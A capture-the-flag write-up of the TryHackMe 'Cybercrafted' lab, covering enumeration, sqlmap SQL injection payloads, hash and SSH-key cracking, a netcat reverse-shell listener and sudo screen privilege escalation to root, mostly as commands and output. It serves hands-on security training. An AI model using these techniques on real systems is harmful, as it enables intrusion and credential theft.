TryHackMe >> Cybercrafted

• URL: https://tryhackme.com/room/cybercrafted
• Target OS: Linux
• Rated Difficulty: Medium
  

DESCRIPTION

You have found an IP address of an in-development Minecraft server. Can you root it?

ENUM >> NMAP

Nmap scan report for cybercrafted.thm (10.10.142.63)
Host is up (0.33s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:36:ce:b9:ac:72:8a:d7:a6:b7:8e:45:d0:ce:3c:00 (RSA)
|   256 e9:e7:33:8a:77:28:2c:d4:8c:6d:8a:2c:e7:88:95:30 (ECDSA)
|_  256 76:a2:b1:cf:1b:3d:ce:6c:60:f5:63:24:3e:ef:70:d8 (ED25519)
80/tcp    open  http      Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Cybercrafted
|_http-favicon: Unknown favicon MD5: 4E1E2DCB46BCB45E53566634707765D9
|_http-server-header: Apache/2.4.29 (Ubuntu)
25565/tcp open  minecraft Minecraft 1.7.2 (Protocol: 127, Message: ck00r lcCyberCraftedr ck00rrck00r e-TryHackMe-r  ck00r, Users: 0/1)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 13:04:30 2022 -- 1 IP address (1 host up) scanned in 2216.07 seconds

• Found at the bottom of http://cybercrafted.thm/index.html:

</body> <!-- A Note to the developers: Just finished up adding other subdomains, now you can work on them! --> </html>

• That sounds like an invitation for a vhost scan… 😉

ENUM >> GoBuster subdomain (vhost) scan

Found: store.cybercrafted.thm (Status: 403) [Size: 287]
Found: admin.cybercrafted.thm (Status: 200) [Size: 937]

NOTE: GoBuster’s vhost scan will unfortunately return hits on every vhost it tries in the wordlist, and unlike the dir scans, you cannot set a list of status codes to return (or ignore). However, failed hits will return 404 status codes. A friendly piece of advice is don’t simply grep the list by "Status Code: 200" to get all positives, I nearly missed store. because it was a 403. Instead – grep -v "Status: 404" will work a lot better for you to get a positive result list.

ENUM >> GoBuster dir scan on store.cybercrafted.thm

❯ gobuster dir -u http://store.cybercrafted.thm -w /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt -x php  -t 20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://store.cybercrafted.thm
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-small-words-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/02/12 15:29:30 Starting gobuster in directory enumeration mode
===============================================================
/search.php           (Status: 200) [Size: 838]
/assets               (Status: 301) [Size: 333] [--> http://store.cybercrafted.thm/assets/]

ENUM >> SQLMap on store.cybercrafted.thm / search.php

• OK, so poking around the new website on http://store.cybercrafted.thm I found a search page that could be SQL injectable:

❯ sqlmap -u http://store.cybercrafted.thm/search.php --forms --crawl=2 --batch --dump webapp
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.12#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[*] starting @ 15:39:49 /2022-02-12/

[15:39:49] [INFO] starting crawler for target URL 'http://store.cybercrafted.thm/search.php'
[15:39:49] [INFO] searching for links with depth 1
[15:39:50] [INFO] searching for links with depth 2
[1/1] Form:
POST http://store.cybercrafted.thm/search.php
POST data: search=&submit=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: search=&submit=] (Warning: blank fields detected): search=&submit=
[15:39:51] [INFO] resuming back-end DBMS 'mysql'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=JtBW' AND (SELECT 9659 FROM (SELECT(SLEEP(5)))dPlw) AND 'aFHR'='aFHR&submit=

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: search=JtBW' UNION ALL SELECT NULL,CONCAT(0x71706a7671,0x4c564c4b42736f6b656c70474170766558515a48614c5951454c4543436176577a686976497a5a44,0x7176706a71),NULL,NULL-- -&submit=
---
[15:39:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[15:39:51] [INFO] fetching tables for database: 'webapp'
[15:39:51] [INFO] fetching columns for table 'admin' in database 'webapp'
[15:39:52] [INFO] fetching entries for table 'admin' in database 'webapp'
[15:39:52] [INFO] recognized possible password hashes in column 'hash'
Database: webapp
Table: admin
[2 entries]
+----+------------------------------------------+---------------------+
| id | hash                                     | user                |
+----+------------------------------------------+---------------------+
| 1  | <REDACTED> | xXUltimateCreeperXx |
| 4  | <REDACTED> | web_flag            |
+----+------------------------------------------+---------------------+

• Win win, a flag and a password hash! 😉

ENUM >> HashCat xXUltimateCreeperXx’s password

 hashcat -m 100 admin_pass.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, 5121/5185 MB (2048 MB allocatable), 4MCU

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

<REDACTED>:diamond123456789

Session..........: hashcat
Status...........: Cracked
Hash.Name........: SHA1
Hash.Target......: 88b949dd5cdfbecb9f2ecbbfa24e5974234e7c01
Time.Started.....: Sat Feb 12 15:54:39 2022 (3 secs)
Time.Estimated...: Sat Feb 12 15:54:42 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2553.1 kH/s (0.61ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8638464/14344385 (60.22%)
Rejected.........: 0/8638464 (0.00%)
Restore.Point....: 8634368/14344385 (60.19%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: diancarol -> diamada

Started: Sat Feb 12 15:54:15 2022
Stopped: Sat Feb 12 15:54:44 2022

• Boom! We got creds! Let’s use them to login to the http://admin.cybercrafted.thm site:

PRIVESC >> Reverse Shell…

• The screenshot kind of says it all, just a simple bash reverse shell in the command box:

• … and there is our shell access! 😉

❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.9.0.248] from (UNKNOWN) [10.10.151.36] 43298
bash: cannot set terminal process group (1095): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cybercrafted:/var/www/admin$

ENUM >> cracking xxultimatecreeperxx passworded ssh key

• OK, finding xxultimatecreeperxx‘s ssh key is great and all, but it is protected with a password… let’s feed it to john! First, we need to convert it to a format that john can crack using ssh2john.py, then we can throw the hash at john to do all the heavy lifting:

❯ python2.7 /usr/share/john/ssh2john.py xxultimatecreeperxx > xxultimatecreeperxx.hash

❯ john --wordlist=/usr/share/wordlists/rockyou.txt xxultimatecreeperxx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED>      (?)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:43 DONE (2022-02-12 16:13) 0.02310g/s 331370p/s 331370c/s 331370C/sa6_123..*7¡Vamos!
Session completed

• Now to test our freshly cracked ssh key:

❯ ssh -i xxultimatecreeperxx xxultimatecreeperxx@cybercrafted.thm
Enter passphrase for key 'xxultimatecreeperxx':
xxultimatecreeperxx@cybercrafted:~$

LOOT >> Minecraft server flag

xxultimatecreeperxx@cybercrafted:/opt/minecraft$ cat minecraft_server_flag.txt
<REDACTED>

ENUM >> dodgy "LoginSystem" plugin…

• OK there is a super-sus looking plugin installed on this server named LoginSystem – it consists of 4 files:

xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ ls
language.yml  log.txt  passwords.yml  settings.yml

• I bet that log.txt has something juicy…

LOOT >> log.txt from LoginSystem leaks passwords!!!

[2021/06/27 11:25:07] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:25:16] cybercrafted registered. PW: <REDACTED>
[2021/06/27 11:58:52] [BUKKIT-SERVER] Startet LoginSystem!
[2021/06/27 11:59:01] madrinch logged in. PW: Password123

• cybercrafted’s Minecraft creds! (madrinch doesn’t have an account on this system)… surely though they wouldn’t be that outright stupid to use that as their ssh password as well though?

PRIVESC >> su cybercrafted

• … I guess they are that stupid.

xxultimatecreeperxx@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$ su cybercrafted
Password: 
cybercrafted@cybercrafted:/opt/minecraft/cybercrafted/plugins/LoginSystem$

LOOT >> user.txt

cybercrafted@cybercrafted:~$ cat user.txt
<REDACTED>

PRIVESC >> access to server running on root via screen

• OK we have moved up the user chain to the account that runs the Minecraft server, and more importantly we have their password… what can they do with sudo?:

cybercrafted@cybercrafted:~$ sudo -l
[sudo] password for cybercrafted:
Matching Defaults entries for cybercrafted on cybercrafted:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cybercrafted may run the following commands on cybercrafted:
    (root) /usr/bin/screen -r cybercrafted
cybercrafted@cybercrafted:~$ sudo /usr/bin/screen -r cybercrafted

• MMMM SCREEN! Connecting to this drops us on the console of the minecraft server… I did play with log4j (because why not! it was how the log4j exploit was discovered!) but didn’t get far… Oh well, simply hitting ctrl-a c drops us to a shell anyway:

# whoami
root
# cd /root
# cat root.txt
<REDACTED>